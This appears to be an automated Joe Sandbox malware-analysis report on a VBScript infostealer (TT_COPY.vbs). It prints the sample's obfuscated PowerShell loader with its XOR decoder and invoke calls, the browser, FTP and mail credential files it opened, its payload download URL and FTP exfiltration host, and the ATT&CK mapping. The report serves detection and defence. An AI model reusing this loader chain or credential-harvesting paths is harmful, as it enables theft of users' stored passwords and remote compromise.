'e6c9c4d6d68985f5d0c7c9ccc68985f6c0c4c9c0c18985e4cbd6cce6c9c4d6d68985e4d0d1cae6c9c4d6d6';$ghegish2=smertensbarns0 'eccbd3cacec0';$ghegish3=smertensbarns0 'f5d0c7c9ccc68985edccc1c0e7dcf6ccc28985ebc0d2f6c9cad18985f3ccd7d1d0c4c9';$ghegish4=smertensbarns0 'f3ccd7d1d0c4c9e4c9c9cac6';$ghegish5=smertensbarns0 'cbd1c1c9c9';$ghegish6=smertensbarns0 'ebd1f5d7cad1c0c6d1f3ccd7d1d0c4c9e8c0c8cad7dc';$ghegish7=smertensbarns0 'ece0fd';$ghegish8=smertensbarns0 'f9';function fkp {param ($upgrown, $depressionsperioder) ;$hoeres0 =smertensbarns0 '81eed7c8c8c0d7c0cb8598858dfee4d5d5e1cac8c4cccbf89f9fe6d0d7d7c0cbd1e1cac8c4cccb8be2c0d1e4d6d6c0c8c7c9ccc0d68d8c85d985f2cdc0d7c088eac7cfc0c6d185de8581fa8be2c9cac7c4c9e4d6d6c0c8c7c9dce6c4c6cdc08588e4cbc18581fa8be9cac6c4d1cccacb8bf6d5c9ccd18d81e2cdc0c2ccd6cd9d8cfe8894f88be0d4d0c4c9d68d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6958c85d88c8be2c0d1f1dcd5c08d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6948c';&($ghegish7) $hoeres0;$hoeres5 = smertensbarns0 '81e6cdccc9c985988581eed7c8c8c0d7c0cb8be2c0d1e8c0d1cdcac18d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6978985fef1dcd5c0fef8f885e58d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d696898581e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6918c8c';&($ghegish7) $hoeres5;$hoeres1 = smertensbarns0 'd7c0d1d0d7cb8581e6cdccc9c98beccbd3cacec08d81cbd0c9c98985e58dfef6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3f88debc0d288eac7cfc0c6d185f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3cc
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp {Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CC
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 392, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: Yara matchFile source: 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 392, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 392, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts211
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          1
          Disable or Modify Tools
          2
          OS Credential Dumping
          1
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          1
          Exfiltration Over Alternative Protocol
          1
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts321
          Scripting
          Boot or Logon Initialization Scripts1
          Access Token Manipulation
          1
          Deobfuscate/Decode Files or Information
          1
          Credentials in Registry
          115
          System Information Discovery
          Remote Desktop Protocol2
          Data from Local System
          Exfiltration Over Bluetooth1
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts21
          Command and Scripting Interpreter
          Logon Script (Windows)11
          Process Injection
          321
          Scripting
          Security Account Manager221
          Security Software Discovery
          SMB/Windows Admin Shares1
          Email Collection
          Automated Exfiltration2
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts1
          PowerShell
          Logon Script (Mac)Logon Script (Mac)2
          Obfuscated Files or Information
          NTDS1
          Process Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer22
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading
          LSA Secrets241
          Virtualization/Sandbox Evasion
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common241
          Virtualization/Sandbox Evasion
          Cached Domain Credentials1
          Application Window Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Access Token Manipulation
          DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
          Process Injection
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
          http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16po0%Avira URL Cloudsafe
          http://OowQOv.com0%Avira URL Cloudsafe
          ftp://ftp.mcmprint.netnoffice0%Avira URL Cloudsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%Avira URL Cloudsafe
          http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%Avira URL Cloudsafe
          https://wNUxderhdqerb.org0%Avira URL Cloudsafe
          http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX160%Avira URL Cloudsafe
          http://go.micros0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          ftp.mcmprint.net
          185.31.121.136
          truefalse
            unknown
            b3solutionscws.com
            192.185.145.188
            truefalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16false
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://OowQOv.comCasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://127.0.0.1:HTTP/1.1CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              low
              https://aka.ms/pscore68powershell.exe, 00000002.00000002.2164704518.0000026A961B1000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16poCasPol.exe, 00000007.00000002.6650313755.00000000010DE000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2164704518.0000026A961B1000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://wNUxderhdqerb.orgCasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  ftp://ftp.mcmprint.netnofficeCasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://go.microsCasPol.exe, 00000007.00000002.6650870632.00000000010F5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwCasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://DynDns.comDynDNSnamejidpasswordPsi/PsiCasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  192.185.145.188
                  b3solutionscws.comUnited States
                  46606UNIFIEDLAYER-AS-1USfalse
                  185.31.121.136
                  ftp.mcmprint.netBulgaria
                  199364RAX-ASBGfalse
                  Joe Sandbox Version:36.0.0 Rainbow Opal
                  Analysis ID:758166
                  Start date and time:2022-12-01 15:47:21 +01:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 13m 47s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:TT_COPY.vbs
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                  Run name:Suspected Instruction Hammering
                  Number of analysed new started processes analysed:14
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal96.troj.spyw.evad.winVBS@7/4@2/2
                  EGA Information:
                  • Successful, ratio: 50%
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .vbs
                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                  • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, UserOOBEBroker.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe
                  • TCP Packets have been reduced to 100
                  • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, login.live.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, wdcp.microsoft.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 2556 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • VT rate limit hit for: TT_COPY.vbs
                  No simulations
                  No context
                  No context
                  No context
                  No context
                  No context
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):0.34726597513537405
                  Encrypted:false
                  SSDEEP:3:Nlll:Nll
                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:@...e...........................................................
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):30
                  Entropy (8bit):3.964735178725505
                  Encrypted:false
                  SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                  MD5:9F754B47B351EF0FC32527B541420595
                  SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                  SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                  SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                  Malicious:false
                  Preview:NordVPN directory not found!..
                  File type:ASCII text, with CRLF line terminators
                  Entropy (8bit):5.882508768775152
                  TrID:
                    File name:TT_COPY.vbs
                    File size:319816
                    MD5:a27bc40b7cf1e7e7e7a9b38221d4e849
                    SHA1:d24c19f3cf76f8f47fa6fffb12422f0fa0252b3b
                    SHA256:28a30c25fb101ed42b050c4b82777929b1cdd9fe02f8f386bb9708d3adb3b9bf
                    SHA512:b6bbcd0f8e6fa19acc91441f41f9f277a11399b15071ce06acbae4771954bba33e0acf7ee279498bfd701a3beec55c54687a25c579a54be9adcbfa2c133731f8
                    SSDEEP:6144:T2J71kKaq/0xBIAbO0uzJ44bQ+YwMpXj/3CAS/Sv5Hx5QS:TBKd/0UAbO0q44jkTbvL5QS
                    TLSH:CF645990AD3B55900E4BA71AFBF149CD4FF30FE3F1012F9B29B45246372A3689A19197
                    File Content Preview:Smigesparcelwisecisal = ChrW(11202)......on error resume next ..Tilendebringerlateenrigg186 = FileLen("Lassoers89")......Dveskolenliveborns = Ucase(Trim(Mid("Referencerne",27,150)) ) ......BESPARINGERNESUNDERSPR = Space(35)....'LIVSFRELSERNE Concocted BYG
                    Icon Hash:e8d69ece869a9ec4
                    TimestampSource PortDest PortSource IPDest IP
                    Dec 1, 2022 15:50:07.835916996 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:07.952136993 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:07.952317953 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:07.952996969 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.069183111 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.081645966 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.081737995 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.081804037 CET8049824192.185.145.188192.168.11.20
